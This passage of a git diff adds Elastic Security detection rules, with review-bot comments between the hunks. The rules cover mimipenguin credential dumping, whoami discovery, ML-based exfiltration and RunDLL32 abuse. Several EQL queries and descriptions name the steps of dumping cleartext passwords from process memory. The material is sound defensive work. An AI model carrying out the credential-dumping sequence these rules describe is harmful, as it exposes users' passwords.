Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: TripleCross", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json new file mode 100644 index 00000000000..199c2b25cf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6.json 
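Review bot: The query pins the binary to `process.executable == "/usr/sbin/tc"`, so a tc invocation from any other install path on a distribution that does not place it there falls outside the rule, although the name, description and references describe tc in general; matching `process.name == "tc"` (optionally together with a list of known paths) would align coverage with the description, and if the single path is deliberate to limit noise, an EQL `/* … */` comment in the query saying so would keep that decision with the rule. The MITRE mapping is Execution / T1059.004 (Unix Shell) with the tag `Tactic: Execution`, while the description frames the behaviour as manipulating incoming traffic through a BPF filter; I would confirm that mapping is the intended one. The `setup` text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, whereas every other link in the same block uses `current`.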
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Proc Filesystem", + "query": "sequence by host.id, process.parent.name with maxspan=1m\n [process where host.os.type == \"linux\" and process.name == \"ps\" and event.action == \"exec\"\n and process.args in (\"-eo\", \"pid\", \"command\")]\n [process where host.os.type == \"linux\" and process.name == \"strings\" and event.action == \"exec\"\n and process.args : \"/tmp/*\"]\n", + "references": [ + "https://github.com/huntergregal/mimipenguin", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using 
Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + }, + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json new file mode 100644 index 00000000000..5baa3c29fdb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7.json 
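Review bot: This rule sets no `timestamp_override`, whereas the other EQL rules in this change (ef04a476, ef862985) carry `"timestamp_override": "event.ingested"`; with a `now-9m` lookback and a 1-minute `maxspan`, events whose `@timestamp` lags ingestion can fall outside the window, so if the omission is deliberate it deserves a sentence in `setup`, otherwise the field should be added. The description reads `which is linux adaptation of Windows tool mimikatz`; `which is a Linux adaptation of the Windows tool mimikatz` is the intended wording. Both points apply unchanged to the version-7 file in the next hunk (`ef100a2e-…_7.json`), which differs from this one only in the `## Setup` heading and the trailing newline of the `setup` string.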
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Proc Filesystem", + "query": "sequence by host.id, process.parent.name with maxspan=1m\n [process where host.os.type == \"linux\" and process.name == \"ps\" and event.action == \"exec\"\n and process.args in (\"-eo\", \"pid\", \"command\")]\n [process where host.os.type == \"linux\" and process.name == \"strings\" and event.action == \"exec\"\n and process.args : \"/tmp/*\"]\n", + "references": [ + "https://github.com/huntergregal/mimipenguin", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent 
using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + }, + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json new file mode 100644 index 00000000000..de92b4dcb52 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_110.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious use of whoami.exe which displays user, group, and privileges information for the user who is currently logged on to the local system.", + "false_positives": [ + "Some normal use of this program, at varying levels of frequency, may originate from scripts, automation tools and frameworks. Usage by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Whoami Process Activity", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n (\n /* scoped for whoami execution under system privileges */\n (\n user.domain : (\"NT *\", \"* NT\", \"IIS APPPOOL\") and\n user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-82-*\") and\n not ?winlog.event_data.SubjectUserName : \"*$\"\n ) and\n not (\n process.parent.name : \"cmd.exe\" and\n process.parent.args : (\n \"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\"\n )\n ) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\n \"C:\\\\Program 
Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\"\n )\n ) or\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + 
{ + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "ef862985-3f13-4262-a686-5f357bbb9bc2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json new file mode 100644 index 00000000000..24d11a1bbf0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json 
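Review bot: The parent-process exclusions in the query — the three exact `process.parent.args` strings under `cmd.exe`, the `appcmd.exe … LIST` case and the `MonitoringHost.exe` / `cohesity_windows_agent_service.exe` executables — carry no indication of which product or task emits them, so a maintainer cannot tell when one can be retired or whether a new entry belongs with an existing group. The query already uses an EQL comment for the SYSTEM scoping (`/* scoped for whoami execution under system privileges */`); one comment per exclusion group in the same style, e.g. `/* third-party agents known to run whoami under SYSTEM */` before the executable list, would keep that knowledge in the rule. The same applies to the version-111 file in the next hunk, whose only other difference is narrowing the index pattern from `logs-endpoint.events.*` to `logs-endpoint.events.process-*`.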
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious use of whoami.exe which displays user, group, and privileges information for the user who is currently logged on to the local system.", + "false_positives": [ + "Some normal use of this program, at varying levels of frequency, may originate from scripts, automation tools and frameworks. Usage by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Whoami Process Activity", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n (\n /* scoped for whoami execution under system privileges */\n (\n user.domain : (\"NT *\", \"* NT\", \"IIS APPPOOL\") and\n user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-82-*\") and\n not ?winlog.event_data.SubjectUserName : \"*$\"\n ) and\n not (\n process.parent.name : \"cmd.exe\" and\n process.parent.args : (\n \"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\"\n )\n ) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\n \"C:\\\\Program 
Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\"\n )\n ) or\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + 
{ + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "ef862985-3f13-4262-a686-5f357bbb9bc2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json new file mode 100644 index 00000000000..1edec5134a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json 
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_port", + "name": "Potential Data Exfiltration Activity to an Unusual Destination Port", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "ef8cc01c-fc49-4954-a175-98569c646740", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ef8cc01c-fc49-4954-a175-98569c646740_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json new file mode 100644 index 00000000000..6ebcffcebae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json 
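Review bot: The `tags` array carries both `Rule Type: ML` and `Rule Type: Machine Learning`, two spellings of the same classification; if one is retained deliberately as a compatibility alias, that should be recorded in the rule's changelog, otherwise the duplicate should go. The `setup` string has a trailing space before `\n\n` in two places (`…(for network events only). \n\n` and `…Anomaly Detection feature. \n\n`), which renders as trailing whitespace in the guide. The documentation links in the same block use two URL forms, `https://docs.elastic.co/en/integrations/endpoint` and `https://docs.elastic.co/integrations/network_traffic`; picking one form avoids a redirect-dependent link.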
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
